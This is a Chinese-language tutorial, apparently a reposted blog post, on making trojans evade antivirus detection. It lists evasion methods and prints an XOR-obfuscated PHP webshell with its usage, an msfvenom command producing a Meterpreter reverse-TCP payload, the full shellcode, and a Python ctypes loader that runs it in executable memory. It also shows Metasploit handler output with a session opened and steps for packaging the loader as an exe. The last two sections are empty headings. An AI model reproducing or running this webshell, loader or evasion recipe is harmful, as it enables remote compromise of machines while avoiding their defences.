木马免杀基础原理和代码实现
06-木马免杀基础原理和代码实现
一 什么是免杀
1、免杀的概念
免杀技术全称为反杀毒技术(Anti Anti- Virus),简称“免杀”。
它指的是一种能使病毒木马免于被杀毒软件查杀的技术。由于免杀技术的涉猎面非常广,包含反汇编、逆向工程、系统漏洞等技术,所以难度比较高。
2、杀软的原理
病毒查杀一般可以分为三种方式:静态查杀、行为查杀和云查杀
(1)静态查杀:一般根据特征码识别,然后对文件进行特征匹配。
(2)行为查杀(动态查杀):主要是对其产生的行为进行检测。
(3)云查杀:提取出文件的特征和上传云端,云端进行检测后返回客户端,对对应病毒进行查杀。
3、免杀的方法
(1)对ShellCode进行加密处理,如异或、转置、AES加密、Base64编码、多轮加密等。
(2)对加载器代码进行加密或编码处理,使其静态特征不再明显。
(3)分离免杀,将ShellCode和加载器代码放置于网络上,通过下载的方式进行加载,可进一步免除静态特征。
(4)通过进程注入或借助傀儡进程进行加载和运行。
(5)通过加壳的方式对木马进行混淆,进而绕过杀软。
通过静态特征绕过杀软检测相对比较容易,但是要绕过沙箱或动态检测,则非常难。
使用python开发的任何exe程序,360都识别为木马
二 脚本型木马免杀
<?php
@$_++;
$__=("`"^"?").(":"^"}").("%"^"`").("{"^"/");
$___=("$"^"{").("~"^".").("/"^"`").("-"^"~").("("^"|");
${$__}[!$_](${$___}[$_]);
?>
++ 变量自加1
! 非运算符(取反)
^ 异或 把数据转为二进制来运行,不相同的取1,相同的取0
异或运算在免杀应用非常广泛
A^B=C
C^B=A
在加密算法中的应用
比如把A作为密钥,B是要加密的明文,C是加密后的密文
加密过程
A^B=C
解密过程
C^A=B
字符在进行异或运算时,会先转换为ASCII码,再进行异或运算
应用
http://192.168.3.56/mm.php?0=assert
POST
1=phpinfo();
三 二进制木马免杀
1 思路
对二进制木马进行免杀,我们需要获取到二进制木马的shellcode,我们的整个过程如下
核心步骤
1 生成后缀为py的二进制木马,我们可以查看到里面的shellcode
2 对shellcode进行加密混淆,对加载器进行加密混淆
3 把py文件传到靶机上,如果靶机没有python环境,这个py文件就运行不了,我们就需要把这个py文件再转换为exe程序
4 把shellcode和加载器放到云端,实现分离免杀
2 生成py二进制木马
获取shellcode
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.3.58 lport=5555 -f py -o msf_64_reverse.py
得到的内容如下
b -> byte
buf = b"" buf += b"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51" buf += b"\x41\x50\x52\x48\x31\xd2\x65\x48\x8b\x52\x60\x48" buf += b"\x8b\x52\x18\x51\x56\x48\x8b\x52\x20\x48\x0f\xb7" buf += b"\x4a\x4a\x48\x8b\x72\x50\x4d\x31\xc9\x48\x31\xc0" buf += b"\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" buf += b"\x01\xc1\xe2\xed\x52\x48\x8b\x52\x20\x8b\x42\x3c" buf += b"\x41\x51\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x0f" buf += b"\x85\x72\x00\x00\x00\x8b\x80\x88\x00\x00\x00\x48" buf += b"\x85\xc0\x74\x67\x48\x01\xd0\x8b\x48\x18\x50\x44" buf += b"\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41" buf += b"\x8b\x34\x88\x4d\x31\xc9\x48\x01\xd6\x48\x31\xc0" buf += b"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1" buf += b"\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44" buf += b"\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44" buf += b"\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01" buf += b"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" buf += b"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41" buf += b"\x59\x5a\x48\x8b\x12\xe9\x4b\xff\xff\xff\x5d\x49" buf += b"\xbe\x77\x73\x32\x5f\x33\x32\x00\x00\x41\x56\x49" buf += b"\x89\xe6\x48\x81\xec\xa0\x01\x00\x00\x49\x89\xe5" buf += b"\x49\xbc\x02\x00\x15\xb3\xc0\xa8\x03\x3a\x41\x54" buf += b"\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07" buf += b"\xff\xd5\x4c\x89\xea\x68\x01\x01\x00\x00\x59\x41" buf += b"\xba\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x41\x5e\x50" buf += b"\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89" buf += b"\xc2\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf" buf += b"\xe0\xff\xd5\x48\x89\xc7\x6a\x10\x41\x58\x4c\x89" buf += b"\xe2\x48\x89\xf9\x41\xba\x99\xa5\x74\x61\xff\xd5" buf += b"\x85\xc0\x74\x0a\x49\xff\xce\x75\xe5\xe8\x93\x00" buf += b"\x00\x00\x48\x83\xec\x10\x48\x89\xe2\x4d\x31\xc9" buf += b"\x6a\x04\x41\x58\x48\x89\xf9\x41\xba\x02\xd9\xc8" buf += b"\x5f\xff\xd5\x83\xf8\x00\x7e\x55\x48\x83\xc4\x20" buf += b"\x5e\x89\xf6\x6a\x40\x41\x59\x68\x00\x10\x00\x00" buf += b"\x41\x58\x48\x89\xf2\x48\x31\xc9\x41\xba\x58\xa4" buf += b"\x53\xe5\xff\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31" buf += b"\xc9\x49\x89\xf0\x48\x89\xda\x48\x89\xf9\x41\xba" buf += b"\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58" buf += b"\x41\x57\x59\x68\x00\x40\x00\x00\x41\x58\x6a\x00" buf += b"\x5a\x41\xba\x0b\x2f\x0f\x30\xff\xd5\x57\x59\x41" buf += b"\xba\x75\x6e\x4d\x61\xff\xd5\x49\xff\xce\xe9\x3c" buf += b"\xff\xff\xff\x48\x01\xc3\x48\x29\xc6\x48\x85\xf6" buf += b"\x75\xb4\x41\xff\xe7\x58\x6a\x00\x59\x49\xc7\xc2" buf += b"\xf0\xb5\xa2\x56\xff\xd5"
py二进制木马上线
import ctypes buf = b"" buf += b"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51" buf += b"\x41\x50\x52\x48\x31\xd2\x65\x48\x8b\x52\x60\x48" buf += b"\x8b\x52\x18\x51\x56\x48\x8b\x52\x20\x48\x0f\xb7" buf += b"\x4a\x4a\x48\x8b\x72\x50\x4d\x31\xc9\x48\x31\xc0" buf += b"\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" buf += b"\x01\xc1\xe2\xed\x52\x48\x8b\x52\x20\x8b\x42\x3c" buf += b"\x41\x51\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x0f" buf += b"\x85\x72\x00\x00\x00\x8b\x80\x88\x00\x00\x00\x48" buf += b"\x85\xc0\x74\x67\x48\x01\xd0\x8b\x48\x18\x50\x44" buf += b"\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41" buf += b"\x8b\x34\x88\x4d\x31\xc9\x48\x01\xd6\x48\x31\xc0" buf += b"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1" buf += b"\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44" buf += b"\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44" buf += b"\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01" buf += b"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" buf += b"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41" buf += b"\x59\x5a\x48\x8b\x12\xe9\x4b\xff\xff\xff\x5d\x49" buf += b"\xbe\x77\x73\x32\x5f\x33\x32\x00\x00\x41\x56\x49" buf += b"\x89\xe6\x48\x81\xec\xa0\x01\x00\x00\x49\x89\xe5" buf += b"\x49\xbc\x02\x00\x15\xb3\xc0\xa8\x03\x3a\x41\x54" buf += b"\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07" buf += b"\xff\xd5\x4c\x89\xea\x68\x01\x01\x00\x00\x59\x41" buf += b"\xba\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x41\x5e\x50" buf += b"\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89" buf += b"\xc2\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf" buf += b"\xe0\xff\xd5\x48\x89\xc7\x6a\x10\x41\x58\x4c\x89" buf += b"\xe2\x48\x89\xf9\x41\xba\x99\xa5\x74\x61\xff\xd5" buf += b"\x85\xc0\x74\x0a\x49\xff\xce\x75\xe5\xe8\x93\x00" buf += b"\x00\x00\x48\x83\xec\x10\x48\x89\xe2\x4d\x31\xc9" buf += b"\x6a\x04\x41\x58\x48\x89\xf9\x41\xba\x02\xd9\xc8" buf += b"\x5f\xff\xd5\x83\xf8\x00\x7e\x55\x48\x83\xc4\x20" buf += b"\x5e\x89\xf6\x6a\x40\x41\x59\x68\x00\x10\x00\x00" buf += b"\x41\x58\x48\x89\xf2\x48\x31\xc9\x41\xba\x58\xa4" buf += b"\x53\xe5\xff\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31" buf += b"\xc9\x49\x89\xf0\x48\x89\xda\x48\x89\xf9\x41\xba" buf += b"\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58" buf += b"\x41\x57\x59\x68\x00\x40\x00\x00\x41\x58\x6a\x00" buf += b"\x5a\x41\xba\x0b\x2f\x0f\x30\xff\xd5\x57\x59\x41" buf += b"\xba\x75\x6e\x4d\x61\xff\xd5\x49\xff\xce\xe9\x3c" buf += b"\xff\xff\xff\x48\x01\xc3\x48\x29\xc6\x48\x85\xf6" buf += b"\x75\xb4\x41\xff\xe7\x58\x6a\x00\x59\x49\xc7\xc2" buf += b"\xf0\xb5\xa2\x56\xff\xd5" #加载器,执行上面的代码 ctypes.windll.kernel32.VirtualAlloc.restype=ctypes.c_uint64; rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(buf), 0x3000, 0x40); ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(rwxpage), ctypes.create_string_buffer(buf), len(buf)); handle = ctypes.windll.kernel32.CreateThread(0, 0, ctypes.c_uint64(rwxpage), 0, 0, 0); ctypes.windll.kernel32.WaitForSingleObject(handle, -1);
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp msf6 exploit(multi/handler) > set lhost 192.168.3.58 lhost => 192.168.3.58 msf6 exploit(multi/handler) > set lport 5555 lport => 5555 msf6 exploit(multi/handler) > run [*] Started reverse TCP handler on 192.168.3.58:5555 [*] Sending stage (200774 bytes) to 192.168.3.95 [*] Meterpreter session 1 opened (192.168.3.58:5555 -> 192.168.3.95:63221) at 2024-10-15 09:59:56 +0800 meterpreter > ifconfig
利用pyinstall打包python代码为可执行程序
安装Pyinstaller
pip install pyinstaller
python代码打包成exe
C:\Users\Administrator\PycharmProjects\pythonProject> pyinstaller.exe -F -w MSFShellcode.py
打包后的exe文件在项目的dist目录下
3 对shellcode进行加密
4 对加载器进行加密
原文地址:https://blog.csdn.net/zhuge_long/article/details/142937905
免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!